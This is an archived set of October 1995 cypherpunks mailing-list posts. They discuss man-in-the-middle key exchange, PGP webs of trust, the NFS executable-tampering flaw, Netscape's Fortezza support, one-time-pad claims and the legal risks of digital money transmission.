Use k-out-of-n secret sharing to split digital coins among hundreds of
pseudo-banks spread throughout the world, so that governments would have
to make a large number of raids to shut it down. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 11 Oct 95 12:01:42 PDT
To: don@cs.byu.edu
Subject: Re: MITM garbage
In-Reply-To: <199510110408.WAA00256@wero.byu.edu>
Message-ID: <199510111901.PAA15377@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes:
>So, if you ask me, none of _those_ methods are very trustworthy considering
>the resources you have to have already assigned to Mitch - after all, 
>keeping a 24 hour Medussawatch on you and your whole ISP is tough work. 
>Going _through_ Mitch is not easy.

I agree.  The whole of the post to which you responded was directed to
the point that MITM is virtually impossible in the real world.  Since
as little as one successful communication can reveal his presence,
Mitch must cover *all* avenues his victims may use.

>>The chance of failure is minimized by diversity in the channels used to
>>try to bypass the MITM. 
>
>I agree-On the other hand, it's not terribly difficult to go _around_
>Mitch.  I mean, just how many of the following things has Mitch done:
>Watch all the ISP's in town and all the phone lines you can use to call
>them.  Filter your work/school ISPs. Filter all your net-using neighbors,
>co-workers, and friends' accounts. etc. All it takes is to get one
>non-Mitch public key. 

Once again.  That's what I said.  "Going around Mitch" is another way
of saying "using (yet) another channel", one which you haven't tried
before, meaning more diversity in the channels.

>>you can't afford a failure, you *do* need a channel over which you have
>>nearly complete control.  The simplest such channel is a physical
>>meeting, during which you exchange public keys.  If the MITM threat is
>
>How do you know you're not giving your key to Mitch. And how do you know
>that Mitch isn't headed over to Alice's later on to pretend to be you and 
>give Alice "your" key?

This goes back to the issue of why you care about the identity of the
key owner.  Presumably you have some knowledge of Alice which may be
verified by physical presence, or Alice carries some credentials which
are sufficiently difficult to forge.  Barring something like this,
though, you *can't* know whether there's a MITM --- but barring prior
knowledge of Alice, you don't care who's behind the key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 11 Oct 95 11:12:45 PDT
To: jim@acm.org
Subject: Re: Elementrix POTP
In-Reply-To: <199510111708.KAA09582@mycroft.rand.org>
Message-ID: <9510111810.AA21080@all.net>
MIME-Version: 1.0
Content-Type: text


> > Sorry to continue "beating a dead horse" here, but I forwarded a few
> > C-punks' messages regarding the Elementrix "Power One-Time Pad" to
> > this person, and I thought you might be interested in her (somewhat
> > cryptic <g>) response.
...

> Except for one thing, i.e. this line from the last blather:
> 
> >The encryption is not done by using an encryption algorithm.
> 
> 'Nuff said for now, I think.

Not quite enough for my taste.  If this system can be uniquely initiated
by a finite sequence of bits transferred between the two parties and can
be used to encrypt more than that many bits, it is not a one-time-pad -
period - full stop.

By definition, the information content of a one-time-pad is one bit per
bit of transmitted information.  If a finite number of bits is enough to
initialize this system, then by definition, it ceases to be a
one-time-pad as soon as one more than that many bits have been
transmitted using those bits as the initialization key.  This is a
direct result of information theory, and cannot be circumvented by any
amount of wizardry or genius.

Even if you found that information theory is palpably inconsistent, the
definition of a one-time-pad (as defined by Shannon in his second most
famous 1949 paper) is in terms of information theory, and therefore, the
end of the theory is also the end of the definition of a one-time-pad.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 10 Oct 95 22:10:45 PDT
To: garnett@wombat.catbelly.com (Santiago de la Paz)
Subject: Re: PC disk wipe software
In-Reply-To: <199510110113.TAA08320@wombat.catbelly.com>
Message-ID: <199510110319.AA32344@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


Crypto  relevance: None.
Privacy relevance: High.

>> Often files retrieved include e-mail thought to have been
>> erased long ago. It survives because the diligent
>> computer system manager makes backup tapes of everything
>> on the system every night, then stores those tapes for
>> years.
>
>Uh... they back up their *mail* spools?  Yeah, right.

machine:/home/mark/.elm mark> grep mbox elmrc
receivedmail = /home/mark/mail/mbox
sentmail = /home/mark/mail/mbox.out

People do record their incoming and outgoing email. Smart ones will store it
offsite (auto farward to their home machine). Others will pgp them online.
Mostly though the cleartext email files will be happily archived away each
night to the nice friendly DAT tape down the corridor in the machine room.

This is also a situation on PC and Mac POP clients. They can be configured to
record your email as it goes in and out. Here we also backup the PC's each
night to a DAT. Thats why it's important to self sanitize your files.

Me, I just nuke any sensitive information that may arrive in my work mbox,
or save/forward it to a safer place. I discourage people from using my work
address as a regular personal contact point.

Also ensure your admins aren't the nosy types. I started work at one place
and noticed in the /.sh_history file that the previous admin was regularly
grepping peoples mail spools for his name. This caused some concern to the
management when they were informed. Obviously these forays were not part of
his everyday job and were a personal endeavour.

Cheers,
Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 11 Oct 95 12:01:37 PDT
To: Christopher Klaus <cklaus@iss.net>
Subject: Re: Announcement: Alert Mailing List
In-Reply-To: <199510092303.QAA16855@iss.net>
Message-ID: <9510111901.AA07166@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Christopher Klaus <cklaus@iss.net>
    Date: Mon, 9 Oct 1995 16:03:28 +1494730 (PDT)

    Announcing a new security mailing list - The Alert.

    The Alert will be covering the following topics:

    	- Security Product Announcements
    	- Updates to Security Products
    	- New Vulnerabilities found
    	- New Security Frequently Asked Question files.
            - New Intruder Techniques and Awareness

This sounds a lot like bugtraq.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 15:09:10 PDT
To: cypherpunks@toad.com
Subject: regulation of money transmitters
Message-ID: <v02120d12aca1f5229110@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I just had a very pleasant conversation with the California
State Banking Department; they are sending me copies of the
relevant laws, and applications for the necessary licenses
to sell negotiable instruments and transmit money overseas.
I spoke with an examiner and she didn't seem to think there was
anything special about them being _digital_ negotiable
instruments.

Apparently it involves a $5,000 non-refundable application fee,
background investigations, examination of the soundness of the
corporation, and the posting of a bond proportional to the
anticipated volume (updated if volume is larger.) All very
reasonable.

Those who might be intereted in actually doing something with
this information should contact Alicia Adoc at (415) 263 8549,
or the banking department in the applicable state.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Wed, 11 Oct 95 07:51:18 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510111418.PAA22841@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



> Two years ago, I pointed out that getting a single message past
> the man in the middle isn't good enough; you have to convince your
> readers that the key they received on one channel is more accurate
> than the key they're receiving on all the other channels.
> But if they'll believe that, they may also believe the man in the middle's
> announcement that the key in your name on all the keyservers is
> wrong, and the correct key is the one he's putting out.
> Can't win either way, but it's still important to get the key out.
> 
> My current key is 0x54696D4D; the fingerprint is 
> 4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.

but this is not Tim May's key, his key is:

pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28 


And this one is signed by these people:

pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
sig       8F898631             Scott Collins (512) <Scott_Collins@genmagic.com>
sig       E972F011             E. Dean Tribble <tribble@xanadu.com>
sig       4C131F57             Tim Oren <oren@apple.com>
sig       F5257117             <tomj@wps.com>
sig       85197FB5             John Gilmore <gnu@cygnus.com>


at level two in the web of trust are these people:

pub   512/F5257117 1992/09/28 <tomj@wps.com>
sig       B1331439             Randy Bush <randy@psg.com>
                              Tom Jennings <tomj@fido.wps.com>
sig       DA0EDC81             Phil Karn <karn@unix.ka9q.ampr.org>
sig       F572C6A7             Jim Cannell <Jim.Cannell@f21.n216.z1.fidonet.org>
sig       0BD91A2D             Phil Karn <karn@unix.ka9q.ampr.org>
sig       F5257117             <tomj@wps.com>
                              Tom Jennings <tomj@fidosw.fidonet.org, 1:125/111>
sig       ADF733A9             Jesse David Hollington <1:225/1.1@fidonet.org>
sig       4D077463             Steve Matzura <steve.matzura@f203.n2603.z1.fidonet.org>
sig       E7F23D95             Mike Laster <1:170/300.23@fidonet>
sig       DB910037             Barry Kapke <96:101/33@dharma>
sig       5B77854F             Depository #1 [Public Keys]
sig       08F811DD             Marcos R. Della <mdella@polyslo.calpoly.edu>
sig       212EC54B             Guy Martin 1:143/269 (guy.martin@f269.n143.z1.fidonet.org)
sig       F572C6A7             Jim Cannell <Jim.Cannell@f21.n216.z1.fidonet.org>
sig       BDFB1F2D             George Gleason <gg@well.sf.ca.us>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
sig       8F898631             Scott Collins (512) <Scott_Collins@genmagic.com>
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       E972F011             E. Dean Tribble <tribble@xanadu.com>
sig       4C131F57             Tim Oren <oren@apple.com>
sig       85197FB5             John Gilmore <gnu@cygnus.com>
sig       DA27EC35             Wes Perkhiser <wes.perkhiser@weise.omahug.org>
sig       E7960501             Paul Schencke <1:135/340@fidonet.org>
sig       9DB252DF             Mike Riddle
sig       734B9A59             Christopher Baker <1:374/14@fidonet.org>
sig       B1B6B823             GK Pace @ 1:374/26 <gk.pace@f26.n374.z1.fidonet.o

pub  1024/85197FB5 1992/11/08 John Gilmore <gnu@cygnus.com>
sig       5ACB1C6D             (Unknown signator, can't be checked)
sig       15100C27             (Unknown signator, can't be checked)
sig       DA0EDC81             Phil Karn <karn@unix.ka9q.ampr.org>
sig       0BD91A2D             Phil Karn <karn@unix.ka9q.ampr.org>
sig       9F9F38BB             Mark Eichin <eichin@athena.mit.edu>
sig       5B415621             Mark Eichin <eichin@paycheck.cygnus.com>
sig       66CE89B7             Mark Eichin <eichin@cygnus.com>
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       BDFB1F2D             George Gleason <gg@well.sf.ca.us>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
sig       8F898631             Scott Collins (512) <Scott_Collins@genmagic.com>
sig       0245C435             Dave Krieger <dkrieger@netcom.com>
sig       4C131F57             Tim Oren <oren@apple.com>
sig       E972F011             E. Dean Tribble <tribble@xanadu.com>
sig       F5257117             <tomj@wps.com>
sig       71946BDF             Phil Karn <karn@qualcomm.com>


If you knew any of the level 1, or level 2 signatories personally and
had exchanged keys face to face, you'd have some assurance.


Also this level 3:

pub  1024/DA0EDC81 1994/07/25 Phil Karn <karn@unix.ka9q.ampr.org>
sig       ED2354B9             Ulla Sandberg <ulla@stupi.se>
sig       9C57B951             Peter Lothberg <roll@stupi.se>
sig       C7A966DD             Philip R. Zimmermann <prz@acm.org>

PRZ, as your PGP distrbution is probably signed by this key, unless
you've inspected the source personally, you're relying on this key
anyway.


Level 4 would be a big web as lots of people fan out from PRZ.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 11 Oct 95 12:19:42 PDT
To: cypherpunks@toad.com
Subject: FWD>sig du crypt
Message-ID: <v02120d02aca1c3e3ad7c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>Date: 11 Oct 1995 11:04:04 -0800
>From: "Vinnie Moscaritolo" <Vinnie_Moscaritolo@quickmail.apple.com>
>Subject: FWD>sig du crypt
>To: "Bob Hettinga" <RAH@shipwright.com>
>
>Mail*Link(r) SMTP               FWD>sig du crypt

>>(forwards factored out)
>>
>>Sig found in sci.crypt:
>>
>>--
>>Eric Norman
>>
>>        "Congress shall make no law restricting the size of integers
>>        that may be multiplied together, or the number of times that
>>        an integer may be multiplied by itself, or the modulus by
>>        which an integer may be reduced".
>>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Wed, 11 Oct 95 07:26:49 PDT
To: Cypherpunks@toad.com
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510111345.AA046029137@hp001c.skyrr.is>
Message-ID: <199510111424.PAA12627@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


If the next challenge is advertised with time enough, I have a spare
MasPar I could use.

I've been considering porting brutessl to it for a while, but never 
actually tried. Maybe I could have time to do it... That would be real
fun!

OTOH I'm about to leave my current job. Maybe I won't have the time...
But I could try. <:-)

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 11 Oct 95 07:28:44 PDT
To: cypherpunks@toad.com
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510111414.KAA27374@panix.com>
Message-ID: <Pine.SOL.3.91.951011152652.1754F-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, Duncan Frissell wrote:

> At 01:45 PM 10/11/95 +0000, Magnus Logi Magnusson wrote:
> 
> Anyone working on self-reporting win32 client?
> 
> Try:
>
> http://www.brute.cl.cam.ac.uk/ftp/pub/brute/w32clnt.zip

It's not (yet) self-reporting.

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 16:07:06 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510111604.AA06660@cantina.verity.com>
Message-ID: <307C4D2F.150B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Patrick Horgan wrote:
> 
> > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> >
> > This one is _really ripe_ for a response to the editor.  Ideas?
> >
> > We could start something off-list if there are several interested in
> > co-authoring.
> >
> I'd love to see something in there about most commercial sites being behind
> firewalls without nfs access across the firewall.  This greatly reduces the
> risk from the nfs problems.  If you get your binary via nfs from a trusted
> host inaccessible from the internet, then if you have this problem management
> can handle it as an employee problem;)  There are ways to make secure
> firewalls, it's fairly well understood.  Sometimes people point to things
> like the hack Mitnick did last Christmas, but his attack took advantage of
> a couple of things a security expert shouldn't have allowed, first and
> foremost two machines were accesible from the internet, and one of them
> trusted root logins from the other without a password:(

  It might also be worth noting that people accessing the net
via an ISP from home do not typically use NFS either.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip J. Nesser" <pjnesser@rocket.com>
Date: Wed, 11 Oct 95 17:03:05 PDT
To: jsw@netscape.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C4D2F.150B@netscape.com>
Message-ID: <199510120001.RAA17707@oac1.rocket.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Jeff Weinstein <jsw@netscape.com>
>Date: Wed, 11 Oct 1995 16:03:11 -0700

>Patrick Horgan wrote:
>> 
>> > From: "K. M. Ellis" <kelli@zeus.towson.edu>
>> >
>> > This one is _really ripe_ for a response to the editor.  Ideas?
>> >
>> > We could start something off-list if there are several interested in
>> > co-authoring.
>> >
>> I'd love to see something in there about most commercial sites being behind
>> firewalls without nfs access across the firewall.  This greatly reduces the
>> risk from the nfs problems.  If you get your binary via nfs from a trusted
>> host inaccessible from the internet, then if you have this problem management
>> can handle it as an employee problem;)  There are ways to make secure
>> firewalls, it's fairly well understood.  Sometimes people point to things
>> like the hack Mitnick did last Christmas, but his attack took advantage of
>> a couple of things a security expert shouldn't have allowed, first and
>> foremost two machines were accesible from the internet, and one of them
>> trusted root logins from the other without a password:(

>  It might also be worth noting that people accessing the net
>via an ISP from home do not typically use NFS either.

>	--Jeff

It might be even better to note that the amount of NFS traffic that passes
outside of a given local network/geographical area is small NFS does
reasonably poorly from a performance perspective over WAN connections in
general so most organizations don't use it for more local are use.
WUarchive allowed it for a while but it was infinitely slow compared to
ftp.  I suspect that a protocol analysis of a major interchange point
(MAE's, NAP's, etc) would show NFS traffic at far less than 1% of the
total.  

The NFS threat should be delegated to that class of problems which are
characterized as locally insecure, which can be easily exploited by a
malicious user (internal or external who has broken in), locally useful,
something which can be made better (kerberos version for example), but
generally isn't for ease of use.

--->  Phil


(BTW my 'mount ftp.netscape.com:/pub /mnt' command failed for some reason,
can you look into it :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Date: Wed, 11 Oct 95 17:05:45 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C4D2F.150B@netscape.com>
Message-ID: <199510120005.RAA01681@moosehead.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Patrick Horgan wrote:
> > 
> > > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> > >
> > I'd love to see something in there about most commercial sites being behind
> > firewalls without nfs access across the firewall.  This greatly reduces the
> 
>   It might also be worth noting that people accessing the net
> via an ISP from home do not typically use NFS either.
> 

They don't often have the skill/knowledge/concern to verify a PGP checksum
to ensure someone didn't patch their browser, either.

People seem to miss that the NFS hack was only an _example_ of a powerful
way to silently destroy the integrity of an executable. Spoofing the
insecure FTP session they used to retrieve it works. Sending them a random
trojan horse works. The point was not that NFS is insecure. It was that
unless you can authenticate your executables as being trustworthy NOTHING
ELSE MATTERS.

SSL, good RNGs for session key selection, etc, are all null
and void if you run (any) untrusted software that patches
your Netscape executable, for example, or if you got a bum copy to
start with.

Paul



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 17:12:37 PDT
To: cypherpunks@toad.com
Subject: Re: Checksums for current beta versions of Netscape Navigator
In-Reply-To: <199510110921.CAA29849@ammodump.mcom.com>
Message-ID: <307C5C84.78A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> 
> 'sabout time.
> 
> In article <199510110921.CAA29849@ammodump.mcom.com>,
> Jeff Weinstein  <jsw@netscape.com> wrote:
> >  This file was signed using my private key.  It can be obtained from
> >my web page using this URL:
> >
> >       http://home.netscape.com/people/jsw/my-pgp-key.txt
> 
> He put his private key on his web page?  Um, maybe not... :-)

  Sorry.  It was late.  It was signed with my private key.  The
public key that can be used to verify the signature can be obtained
from...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 17:11:06 PDT
To: cypherpunks@toad.com
Subject: Re: Banque des Cypherpunks
Message-ID: <v02120d03aca218e0cb4b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>aba@atlas.ex.ac.uk writes:
>>Technologically it would be possible to have multiple ombudsmen, or
>>even have the recovery key be secret share split amongst ecash users
>>in such a way that some chosen percentage of agreement would be
>>required before cash could be traced, or revoked (made worthless).
>

I need to make the legal situation plainer:

This is an all or nothing situation. Dirty money is dirty money.
If the host government(s) decide that your institution was willfully
blind to the transmission of dirty money, they can seize substitute
assets. I'm not saying _should_, I'm not saying that there aren't
fairer ways, but any and all assets in "cooperating" countries _will_
become fair game if the government decides you've let your institution
be used for money laundering.

This property may be transitive -- if another institution knows or should
have known that your institution knows or should have known that the
money was dirty, _they_ may find their assets in cooperating countries
seized. Furthermore, as I mentioned in Part the Second, countries are
blatantly paid off for cooperating. In fact, Munroe mentioned after his
talk that the Swiss are among the very quickest to freeze assets, although
they are very slow to unfreeze them....

I'm not saying there aren't clever ways around this -- it's an arms
race, and one that bankers, regulators and LEAs perceive themselves to
be losing. Nevertheless, I don't think that anyone, regardless of their
intentions, should get involved in international money transmission
unless they are fully aware of the tools and techniques that may be
brought to bear against them.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Oct 95 09:20:28 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
Message-ID: <199510111620.RAA25682@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Netscape to Offer Fortezza Cryptographic Capability for
Its Software Products

Underscores Company's Commitment to US Government Market


Mountain View, Calif., Oct. 10 -- Netscape Communications
Corporation announced today its intent to support the
Fortezza security card, a security technology based on US
government standard cryptography, as a low-cost upgrade
capability for its Netscape Navigator(TM) client software
and other Netscape products. The new capability will
enhance Netscape's offerings for the US government market
and enable the company to provide increased support for
security services for World Wide Web-based tools and
technology.

Developed by the National Security Agency, Fortezza PC
card technology provides strong authentication and
encryption services using US government standard
cryptography, implemented in an industry-standard PCMCIA
security token.  Fortezza PC cards are being used in the
Defense Message System (DMS), a new Department of Defense
electronic messaging system; Intelink, the new US
Government Intelligence Community search system based on
Web technology, and in a number of other government
systems.

"Fortezza is an important technology for major internal
US government networks and for organizations needing
Web-based technology with strong security," said Marc
Andreessen, vice president of technology at Netscape. 
"Support of Fortezza technology will strengthen our
position as a leading supplier of Web-based software
products to the federal government.  We can use the
experience gained with Fortezza and the Secure Sockets
Layer open protocol to implement support for additional
cryptographic devices important to both the federal
government and commercial markets."

Netscape expects to work with information security
specialist Litronic Industries and others regarding the
development, integration and support of the Fortezza
cryptographic interface.  Litronic provides technical
expertise for the implementation of Fortezza libraries
and drivers on a wide variety of platforms. 
California-based Litronic Industries designs,
manufactures and markets information security products
used to secure applications and data transmissions
through the use of encryption technology.

Support for Fortezza has been added to Netscape's Secure
Sockets Layer (SSL) open protocol.  SSL provides a
straightforward method for adding strong security to
existing applications and network infrastructures.  SSL
is application protocol independent and provides
encryption, which creates a secured channel to prevent
others from tapping into the network; authentication,
which uses certificates and digital signatures to verify
the identity of parties in information exchanges and
transactions; and message integrity, which ensures that
messages cannot be altered en route.  Netscape will
upgrade Netscape Navigator and other Netscape products to
support the use of Fortezza with SSL as an enhanced
alternative to software-based cryptographic mechanisms.

"The US government is rapidly moving to World Wide Web
and related open systems technology as an alternative to
proprietary networks and applications," said Paul A.
Strassmann, former director of defense information and
principal deputy assistant secretary of defense, and
currently distinguished visiting professor of information
warfare at the National Defense University.  "Many
federal agencies are adopting Fortezza technology as a
means to secure network transactions over unclassified
and classified networks.  We are pleased to see Netscape
provide support for Fortezza cryptographic cards in a
commercial product based on open systems standards."

Contact:  Kristina Lessing of Netscape, 415-528-2661, or
kristina@netscape.com












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 11 Oct 95 15:22:40 PDT
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: MITM evasion MITM evasion
In-Reply-To: <199510110855.JAA17966@utopia.hacktic.nl>
Message-ID: <199510112222.SAA21067@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous, claiming to be Tim May, writes:
>Two years ago, I pointed out that getting a single message past
>the man in the middle isn't good enough; you have to convince your
>readers that the key they received on one channel is more accurate
>than the key they're receiving on all the other channels.
>But if they'll believe that, they may also believe the man in the middle's
>announcement that the key in your name on all the keyservers is
>wrong, and the correct key is the one he's putting out.
>Can't win either way, but it's still important to get the key out.

I see two general categories of MITM attacks.  In one case, Mitch wants
to eavesdrop on Alice and Bob, but doesn't really care about other
communication they do.  In the other, Mitch wants to know about all of
Alice's communications, regardless of with whom they are.

Public key cryptography turns the first case into two instances of the
second.  If Mitch doesn't control all of both Alice and Bob's
communications with everyone, the will eventually discover that the key
they're using for the other isn't the same one everyone else uses.

In the second MITM model, Mitch has an unbelievable task.  Any public
key that goes from Alice to anyone else, or vice versa, must be
substituted with one Mitch holds.  Any messages *about* public keys
must be transformed into messages about the corresponding MITM keys.

This includes telephone conversations where Alice and Bob exchange
keyids, the business card Eve has printed with her keyid and gives
to Alice at Interop, the Betsi key Alice can read in the newspaper,
WWW pages, files FTP'd, and face-to-face meetings.

Anything short of total control gives Alice an opportunity to learn
about Mitch's presence.  If Alice can exploit the hole enough to get
one good key, Mitch must change his tactics to denial of service
with respect to that key, or Alice can ask the key owner for other
good keys.

If Mitch can successfully surround Alice in such a cloud, I submit
at least one of the following statements is true:

1. Alice is such a non-entity that no one really wants to communicate
with her.

2. Bob can safely assume that the new key he just got isn't really from
Alice, because an Alice-with-a-life surrounded by a nearly successful
Mitch-cloud wouldn't be sending out keys --- she'd be sending out
messages saying "HELP ME!!  I'M LOCKED IN MITCH'S SECRET BOMB
SHELTER!!!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 11 Oct 95 14:29:04 PDT
To: cypherpunks@toad.com
Subject: Re: Checksums for current beta versions of Netscape Navigator
In-Reply-To: <199510110921.CAA29849@ammodump.mcom.com>
Message-ID: <45hcsq$9i4@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


'sabout time.

In article <199510110921.CAA29849@ammodump.mcom.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>  This file was signed using my private key.  It can be obtained from
>my web page using this URL:
>
>	http://home.netscape.com/people/jsw/my-pgp-key.txt

He put his private key on his web page?  Um, maybe not... :-)

   - Ian "Oh, no.  Not again."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 17:31:05 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <v02120d04aca21d2bcd71@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



As I pointed out to Ian on Sunday, this is a very old,
very well-known bug. As I also pointed out, it is a well-
understood fact about Internet security as it stands today
that if you can't trust the people on your subnet, you're
screwed. I also mentioned the facts that have been mentioned
by others on this list (firewalls, most home users don't use
NFS, etc.)

It is profoundly irritating to find this splashed on the
front page of the NYT, contributing to the FUD that
largely benefits luddites like First Virtual and
those, like MS$, pushing for a return to proprietary networks.
(One quote from FV marketing director Pierre Wolfe at the ML
conference I recently attended, "The Internet may end up
as a ghetto, where people are afraid to engage in commercial
activity.")

Furthermore, neither the original post or the NYT article
place any blame on the role of government regulation or
greedy patent-holders in disrupting the formation of protocols
based on strong cryptography, which are two of the major culprits
in this matter.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 11 Oct 95 15:43:53 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Banque des Cypherpunks
In-Reply-To: <28715.9510111748@exe.dcs.exeter.ac.uk>
Message-ID: <199510112243.SAA21752@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


aba@atlas.ex.ac.uk writes:
>Technologically it would be possible to have multiple ombudsmen, or
>even have the recovery key be secret share split amongst ecash users
>in such a way that some chosen percentage of agreement would be
>required before cash could be traced, or revoked (made worthless).

I don't rember if any key-splitting schemes currently allow it, but how
about this:  the escrow agencies would be the courts, requiring one
assent from each judge on the appeals chain.  As each judge rules
against the defendant or denies the appeal, he adds his piece of the
key to the ruling.  When you reach the top of the chain, then *and only
then* can you be traced.

I'm not really sure if this would apply in the ecash situation, since
you don't have a defendant until you've done the trace, but it sounds
like a legitimate safest solution in the case of GAK.  One can hardly
argue that the government has illegally revealed the keys when the
whole legal system has approved it.

NB:  I'm *strongly* opposed to GAK in principle.  I don't personally
think there's any such thing as a "legitimate need for law enforcment"
to listen in on private individuals.  A free man shouldn't have to
arrange for his life to be convenient for his servants --- private or
civil, it should be the other way around.  I'm just nothing that,
working from the common notion of "legal", this system would make
illegal key seizure unlikely.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Wed, 11 Oct 95 17:13:41 PDT
To: cypherpunks@toad.com
Subject: anonymous web pages?
Message-ID: <199510120018.SAA12399@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does any facility current exist to allow people to create anonymous
web pages? After anonymous email and anonymous news postings, this is
an obvious next step.

It seems that it would be a fairly simple matter to write a program
that would accept email containing a web page and the destination URL,
do some checking, and then create (or update) the requested page.
Require signatures and allow receiving mail via a remailer chain, and
you've got secure anonymous web pages.

The hard part would be finding a site that would be willing to serve
anonymous pages. I don't understand the politics at various sites that
allow anonymous remailers: maybe this isn't much harder?

-- 
                                __                      
nelson@santafe.edu              \/              http://www.santafe.edu/~nelson/
PGP key 9D719FAD   Fingerprint 3B 9B 8E 58 1C 90 57 3E  B7 99 ED 13 65 2E 0B 24




